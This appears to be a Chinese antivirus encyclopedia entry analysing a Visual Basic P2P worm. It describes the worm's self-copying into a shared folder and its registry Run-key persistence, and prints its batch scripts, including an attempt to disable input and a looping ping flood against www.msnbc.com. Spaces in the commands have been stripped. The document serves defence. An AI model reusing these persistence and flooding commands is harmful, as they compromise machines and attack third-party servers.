病毒名称(中文):
红色骑士
病毒别名:
P2P-Worm.Win32.VB.ci[AVP]
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
86016
影响系统:
Win9xWinNT
病毒行为:
这是一个用VB编写的蠕虫病毒,由于该病毒的编写存在某些问题,所以不管是在9X系统还是在NT系统下该病毒都只能实现部分功能。病毒会将自己拷贝到C:\Mysharedfolder这个共享文件夹里面来通过共享传播,病毒还会尝试禁止使用鼠标和键盘,不停地向某个网站的服务器发送数据包。
1)病毒将自己拷贝到:
C:\command.com
C:\windows\default.pif
C:\Mysharedfolder\.[随机数字].exe(8个病毒名由随机数字组成的副本)
2)建立一个批处理C:\.[随机数字].bat来尝试禁止使用鼠标和键盘,但是该功能没有实现。
该批处理的内容是:
attrib+hc:\.[随机数字].bat
@echooff
cdc:\windows
rundll32.exemouse,disable
rundll32.exekeyboard,disable
通过在注册表中添加启动项来运行该批处理:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"disble"="c:\.[随机数字].bat"
3)在注册表中为病毒添加启动项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tskmgr=[源病毒路径]
4)建立一个批处理c:\windows\ddos.bat来向www.msnbc.com的服务器不停地发送数据包:
@echooff
attrib+h+s+a+rc:\windows\ddos.bat
:loop
pingwww.msnbc.com
gotoloop
5)病毒体中的一句话:
HeyThereLittleRedRidingHood,Yoursorawlookinggood.Youreverythingabigbadwolfcouldwant.--Rooted